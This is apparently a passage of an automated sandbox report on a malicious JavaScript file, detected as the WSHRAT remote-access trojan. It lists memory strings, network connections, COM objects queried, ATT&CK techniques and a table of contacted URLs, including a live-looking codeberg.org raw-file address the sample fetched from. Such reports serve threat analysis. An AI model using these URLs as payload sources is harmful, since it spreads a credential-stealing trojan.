        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyceDU2
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyceDcz
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifye
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifygaWtL
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifykTiRb
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyr
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifysIlx4
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifytion1301
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifywanpb
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyy
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyyMFx4
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyySWpZ
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify~
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: wscript.exe, 00000001.00000003.1210816033.000001A3BFF9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.timeanddate.com/worldclock/fullscreen.html?n=2
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.7:49699 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Yara detected WSHRAT
        Source: Yara matchFile source: 00000001.00000003.1210816033.000001A3BFF9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1280, type: MEMORYSTR

        System Summary

        barindex
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
        Source: CNWSFY59Z6S1D.JSInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: classification engineClassification label: mal60.troj.winJS@1/0@1/1
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
        Source: CNWSFY59Z6S1D.JSStatic file information: File size 4681079 > 1048576
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3517000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected WSHRAT
        Source: Yara matchFile source: 00000001.00000003.1210816033.000001A3BFF9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1280, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected WSHRAT
        Source: Yara matchFile source: 00000001.00000003.1210816033.000001A3BFF9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1280, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting        		Valid AccountsWindows Management Instrumentation2
        Scripting        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		Boot or Logon Initialization Scripts1
        Obfuscated Files or Information        		LSASS Memory2
        System Information Discovery        		Remote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive14
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer        		Traffic DuplicationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        CNWSFY59Z6S1D.JS0%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifybMTgy0%Avira URL Cloudsafe
        https://codeberg.org/82-00AA004BA90B0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyceDU20%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyceDcz0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifytion13010%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyDXHg20%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyySWpZ0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify10%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyr0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify1MVx40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifygaWtL0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyalif.code/raw/branch/main/neti0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify3NVx40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify2RFx40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifysIlx40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifye0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify00%Avira URL Cloudsafe
        https://codeberg.org/od0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4Njdc0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyPWzU40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyPWzYw0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NTJc0%Avira URL Cloudsafe
        https://codeberg.org/tilify0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifykTiRb0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyyMFx40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NjVc0%Avira URL Cloudsafe
        https://codeberg.org/(0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyFIiwi0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyX0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifywanpb0%Avira URL Cloudsafe
        https://codeberg.org/0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyFXHg20%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyL0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyTZH0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify7DQpp0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyB0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyA0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyF0%Avira URL Cloudsafe
        https://codeberg.org/-80%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyy0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify1TXlQ0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NzNc0%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify2MVx40%Avira URL Cloudsafe
        https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify~0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        codeberg.org
        		217.197.91.145
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifytrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify1wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyDXHg2wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyceDczwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyySWpZwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyrwscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifytion1301wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifybMTgywscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyceDU2wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/82-00AA004BA90Bwscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify1MVx4wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifygaWtLwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify2RFx4wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify3NVx4wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify0wscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyalif.code/raw/branch/main/netiwscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifysIlx4wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/odwscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyewscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4Njdcwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyPWzU4wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyPWzYwwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NTJcwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifykTiRbwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyyMFx4wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/tilifywscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/(wscript.exe, 00000001.00000002.3697719623.000001A3C34F6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NjVcwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyFIiwiwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifywanpbwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyXwscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.3697719623.000001A3C34F6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyFXHg2wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://ip-api.com/json/wscript.exe, 00000001.00000003.1211149901.000001A3BFFB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1210816033.000001A3BFFB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyLwscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify7DQppwscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyTZHwscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
